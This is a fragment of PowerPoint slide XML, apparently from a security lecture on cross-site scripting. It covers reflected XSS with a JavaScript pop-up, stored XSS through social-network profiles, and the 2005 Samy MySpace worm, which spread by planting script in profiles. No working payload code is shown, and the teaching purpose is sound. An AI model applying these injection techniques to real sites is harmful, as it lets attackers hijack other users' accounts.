            <a:ext cx="3749537" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An HTTP GET request will be sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> web server, which returns a page containing the search result, with the original input in the page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C97FCD0-85F3-AE47-B8DF-879CA3D98D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737100" y="3463320"/>
            <a:ext cx="3361805" cy="784830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The input here is a JavaScript code which runs and gives a pop-up message on the victim’s browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93809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B06C263-EE69-0F4D-B02C-5DCFF351985B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> EXAMPLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2045607" y="1019810"/>
            <a:ext cx="567690" cy="778285"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B7566A-2E23-D641-83C3-FDC8E648814A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2061038" y="1249521"/>
            <a:ext cx="3894137" cy="3043883"/>
            <a:chOff x="1243448" y="1035697"/>
            <a:chExt cx="7002437" cy="5607989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826BB0AA-3D82-D04A-AF3D-02C44C8292A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1243448" y="5529013"/>
              <a:ext cx="1025261" cy="1114673"/>
              <a:chOff x="1243448" y="5529013"/>
              <a:chExt cx="1025261" cy="1114673"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Picture 4"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1247889" y="5529013"/>
                <a:ext cx="1020820" cy="1114673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1243448" y="5879592"/>
                <a:ext cx="102962" cy="28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8" name="Picture 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1249032" y="2313497"/>
              <a:ext cx="908138" cy="1170824"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1295769" y="3868349"/>
              <a:ext cx="972940" cy="1299787"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5591650" y="1987825"/>
              <a:ext cx="2654235" cy="3180311"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Arrow 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2626565" y="1035697"/>
              <a:ext cx="1864733" cy="417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ight Arrow 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624230" y="2642967"/>
              <a:ext cx="1864733" cy="417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ight Arrow 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624230" y="4254237"/>
              <a:ext cx="1864733" cy="417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ight Arrow 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624230" y="5748942"/>
              <a:ext cx="1864733" cy="417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Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C6B4CA-4036-464F-81EB-7108E626A687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072638" y="1865389"/>
            <a:ext cx="2709219" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example : User profile in a social network is a channel as it is set by one user and viewed by another.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5BDBE3-9ADC-DD43-BD2A-1FBC5FC430D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393724" y="4039488"/>
            <a:ext cx="3071850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Social networking website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Down Arrow 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8901EFEC-155A-7741-9933-20A907201133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8756241">
            <a:off x="5717380" y="3586555"/>
            <a:ext cx="155168" cy="447902"/>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n w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="975259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68629" y="955596"/>
            <a:ext cx="3903377" cy="3065798"/>
            <a:chOff x="698500" y="1027906"/>
            <a:chExt cx="4884462" cy="3495040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="698500" y="1027906"/>
              <a:ext cx="4884462" cy="3495040"/>
              <a:chOff x="485140" y="2018665"/>
              <a:chExt cx="4884462" cy="3495040"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Picture 3"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="485140" y="2018665"/>
                <a:ext cx="4884462" cy="3495040"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Content Placeholder 3"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="731520" y="2211806"/>
                <a:ext cx="1432560" cy="1454208"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2552700" y="1221047"/>
              <a:ext cx="1722120" cy="338555"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0"/>
                <a:t>Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585376" y="358571"/>
            <a:ext cx="2875579" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Alice’s account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4815131" y="1177854"/>
            <a:ext cx="3663347" cy="1469653"/>
            <a:chOff x="698500" y="1027906"/>
            <a:chExt cx="4884462" cy="1806374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="698500" y="1027906"/>
              <a:ext cx="4884462" cy="1806374"/>
              <a:chOff x="485140" y="2018665"/>
              <a:chExt cx="4884462" cy="1806374"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Picture 13"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId3"/>
              <a:srcRect b="48316"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="485140" y="2018665"/>
                <a:ext cx="4884462" cy="1806374"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Content Placeholder 3"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="731520" y="2211806"/>
                <a:ext cx="1432560" cy="1454208"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2552700" y="1221047"/>
              <a:ext cx="1722120" cy="338555"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0"/>
                <a:t>Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977859" y="363406"/>
            <a:ext cx="3057494" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bob’s account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4512063" y="191395"/>
            <a:ext cx="4320509" cy="4418461"/>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3741809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30851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inject the Code Into a Profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFBE6A7-D548-E74E-8E2C-AE7AF3FDE3D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5421889" y="1160486"/>
            <a:ext cx="3624600" cy="3726900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Samy puts the script in the “About Me” section of his profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>JavaScript code will be run and not displayed to other users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The code sends an add-friend request to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-342892">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As soon as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> profile is loaded, malicious code will get executed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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t="9140"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583549" y="944563"/>
            <a:ext cx="4838340" cy="3425418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B92A82-6DB3-E348-9784-B7D21C3F51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408921" y="2051351"/>
            <a:ext cx="1502891" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> profile page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2542289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err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="944563"/>
            <a:ext cx="7645400" cy="3616804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> is an XSS worm that was designed to propagate across the MySpace social-networking site written by Samy Kamkar. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The worm itself was relatively harmless.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>It carried a payload that would </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>display the string "but most of all, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> is my hero" on a victim's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> profile page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> a friend request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>When a user viewed that profile page, the payload would then be replicated and planted on their own profile page continuing the distribution of the worm. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Within just 20 hours of its October 4, 2005 release, over one million users had run the payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2472467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330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
